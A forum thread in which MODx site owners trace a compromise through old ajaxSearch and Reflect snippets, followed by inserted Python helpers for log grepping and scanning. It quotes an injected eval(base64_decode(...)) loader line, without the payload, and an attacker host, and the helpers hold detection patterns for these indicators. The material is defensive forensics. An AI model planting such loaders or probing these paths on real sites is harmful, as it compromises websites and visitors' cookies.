    FWIW, ajaxsearch and reflect were not being used on the site I saw.
    Matt
    • As far as the Reflect vector went, it didn’t matter if you used it or not. The problem was the snippet code was in a .php file in the assets/snippets/reflect folder, and could be run directly from the browser. There are still a lot of ’bots trying to access that file, even though it hasn’t been included in the installation for some time now.
        Studying MODX in the desert - http://sottwell.com
        Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
        Join the Slack Community - http://modx.org
        Even though this attack appears to have successfully exploited ajaxSearch other vulnerable snippets might have been exploited in a similar manner. I guess I would suggest ’grepping’ Apache log files for ’base64_js’. This might be a commonality in the attacks that can be used to find the vulnerable snippet/entry point that was used.
          Susan, thanks for the response.

          One thing that I have found from this attack is that once it became public knowledge (i.e. Google publishing that my site was delivering malware), the attempted probes/attack attempts increased exponentially. I expect that other attackers have methods to find these compromised sites and research all possible vulnerabilities that may exist for specific CMSs, since it is not generally too difficult to determine which CMS is used as well as all security issues that have been previously posted for those CMSs. That may explain the more recent attempt to exploit an old Reflect vulnerability.

          In any case, the file was missing from the directory and the attack failed.
          • You could get nasty and add a rewrite condition/rule to your .htaccess to send any requests for that file somewhere else. I have in mind a certain very annoying search engine that is also causing problems and completely ignores robots.txt and that has its URL in its browser ID string.

            http://www.webmasterworld.com/search_engine_spiders/4033706.htm
              One of my sites was also hacked in this fashion. Unfortunately I don’t have http log files that go back to the suspected date of attack. My FTP logs look fine, so I don’t think my login has been compromised.

              The attack is written in such a way to only execute once per victim (sets a cookie to check, so if cookies are cleared it will attack again), and tries to not show up for googlebot and other search engines. This makes it hard to detect even for google. I couldn’t find the attack initially after webmaster tools reported that I had malware on my site. Like others, I searched and searched, but came up with nothing (I assumed it was some kind of false positive). So I submitted my site for review to webmaster tools and it came back clean!! It was only after seeing this post that I found the malicious code in my document parser class. Thankfully the code only seems to inject the iframe, and nothing else. I assume if they wrote to the document.parser.class.inc.php file, they could have done more, but perhaps not.

              Since I don’t have log files, I don’t know how the hack was done, but from dougf’s log files I don’t think it was through ajaxsearch (although it shouldn’t be ruled out). I don’t have a file called ajax.php in my ajaxsearch directory, and even if I did, I assume register globals would have to be on. So, since I haven’t fixed anything yet, I think I’ll probably get hacked again (I’m now storing all log files in case).

              I’m using MODx 0.9.6.3 on this site so this problem has existed since then and isn’t something new in 1+. Now on to check the rest of my sites....yeah.

              James
                FYI, my ajaxSearch directory also did not have an ajax.php. This could have been a probe of some type to test for the vulnerability. In any case, if you are on 1.8.1 ajaxSearch you may be vulnerable. I am almost sure it has been suggested to MODX users to upgrade from this version specifically due to an XSS vulnerability.

                If you haven’t modified any files in or touched the ajaxSearch directory in the recent past, or at least since when you think you were hacked, check the file date of the directory. As I said, this was the clue that made me think this was where the exploit took place. The date/time was EXACTLY the same time as the date/time when the request in the log file showed the ’base64_js’ parameter.

                Doug
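Doug's two checks above (search the Apache access log for the base64_js parameter and the old snippet entry points, then compare the matching request's timestamp with the snippet directory's modification time), as an added Python example that is not from the thread. The log lines and the directory timestamp are constructed, and the indicator list is an assumption drawn from the paths mentioned in this thread.

```python
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone

# Constructed Apache combined-format lines (not taken from anyone's real logs in the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2010:03:12:45 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Feb/2010:03:13:02 +0000] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js=PLACEHOLDER HTTP/1.1" 200 73 "-" "Mozilla/4.0"
198.51.100.4 - - [14/Feb/2010:03:15:10 +0000] "GET /assets/snippets/reflect/snippet.reflect.php?x=1 HTTP/1.1" 404 210 "-" "-"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Indicators named in the thread (assumed list): the base64_js parameter and the two snippet entry points.
INDICATORS = ("base64_js", "/assets/snippets/reflect/", "/assets/snippets/ajaxSearch/ajax.php")

def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"), "status": int(m.group("status"))}

def suspicious_requests(log_text):
    """Doug's grep: entries whose path or query string carries one of the indicators."""
    hits = [parse_line(l) for l in log_text.splitlines()]
    return [h for h in hits if h and any(ind in h["path"] for ind in INDICATORS)]

def correlate_with_mtime(hits, directory, window_seconds=120):
    """Doug's second check: which hits landed within window_seconds of the directory's mtime?"""
    mtime = datetime.fromtimestamp(os.stat(directory).st_mtime, tz=timezone.utc)
    window = timedelta(seconds=window_seconds)
    return [h for h in hits if abs(h["ts"] - mtime) <= window]

def demo():
    """Stand-alone run: a temp directory plays the role of assets/snippets/ajaxSearch."""
    hits = suspicious_requests(SAMPLE_LOG)
    with tempfile.TemporaryDirectory() as d:
        # Pretend the directory was last modified at the moment of the base64_js request.
        stamp = datetime(2010, 2, 14, 3, 13, 2, tzinfo=timezone.utc).timestamp()
        os.utime(d, (stamp, stamp))
        matched = correlate_with_mtime(hits, d)
    return hits, matched

if __name__ == "__main__":
    print(demo()[1])
```

On a real install, feed the server's access log to suspicious_requests and pass the actual assets/snippets/ajaxSearch path to correlate_with_mtime; a 404 hit still tells you who is probing even when the file is gone.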
                  I was also infected with this hack.
                  Using Evolution 1.0.2
                  ajaxSearch not used, but version 1.8.4
                  reflect folder does not contain any snippet.reflect.php

                  My manager/includes/document.parser.class.inc.php was modified with this added at the bottom:
                  eval(base64_decode("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"));


                  I cannot find any of the other files involved that people are mentioning..

                  I have removed the code, but does anyone have any idea how to stop this attack?
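A way to find the appended eval(base64_decode("...")) loader described in the post above across a whole install, as an added Python example that is not from the thread. The mini-install it scans is constructed in a temporary directory and the base64 blob is a harmless placeholder, not the real payload; the blob is decoded only for a preview and is never executed.

```python
import base64
import os
import re
import tempfile

# The loader shape reported in the thread: eval(base64_decode("...")) appended to a core PHP file.
EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')

def scan_file(path):
    """Return [(line_number, decoded_preview)] for each eval(base64_decode()) found in one file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for m in EVAL_B64.finditer(line):
                try:  # decode only to show what the blob holds; it is never executed
                    preview = base64.b64decode(m.group(1), validate=True)[:60].decode("utf-8", "replace")
                except ValueError:
                    preview = "<undecodable>"
                findings.append((lineno, preview))
    return findings

def scan_tree(root):
    """Walk an install and scan every .php file; returns {relative_path: findings} for files with hits."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                found = scan_file(full)
                if found:
                    report[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return report

def demo():
    """Build a constructed mini-install in a temp dir: one clean file, one with the appended loader."""
    blob = base64.b64encode(b"/* constructed placeholder, not the real payload */").decode()
    with tempfile.TemporaryDirectory() as root:
        inc = os.path.join(root, "manager", "includes")
        os.makedirs(inc)
        with open(os.path.join(inc, "document.parser.class.inc.php"), "w") as fh:
            fh.write("<?php\nclass DocumentParser {\n}\n")
            fh.write(f'eval(base64_decode("{blob}"));\n')  # the injected last line
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php\ninclude 'manager/includes/document.parser.class.inc.php';\n")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point scan_tree at the web root of a real MODx install; removing the line is only a start, since the entry point used to write it (and any other modified file) still has to be found and closed.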
                  • So you use ajaxSearch 1.8.4 ?

                    this goes to
                    h t t p : / / g c o u n t e r . c n / i n f o . p h p
                    (when you try to visit it, it’s been blocked by google.com)

                    try to disable any form input, AjaxSearch, or Comments.
                      Rico
                      Genius is one percent inspiration and ninety-nine percent perspiration. Thomas A. Edison
                      MODx is great, but knowing how to use it well makes it perfect!

                      www.virtudraft.com

                      Security, security, security! | Indonesian MODx Forum | MODx Revo's cheatsheets | MODx Evo's cheatsheets

                      Author of Easy 2 Gallery 1.4.x, PHPTidy, spieFeed, FileDownload R, Upload To Users CMP, Inherit Template TV, LexRating, ExerPlan, Lingua, virtuNewsletter, Grid Class Key, SmartTag, prevNext

                      Maintainer/contributor of Babel

                      Because it's hard to follow all topics on the forum, PING ME ON TWITTER @_goldsky if you need my help.
                    • One more thing:

                      CLEAN YOUR OWN BROWSERS.

                      That code tries to read Cookies.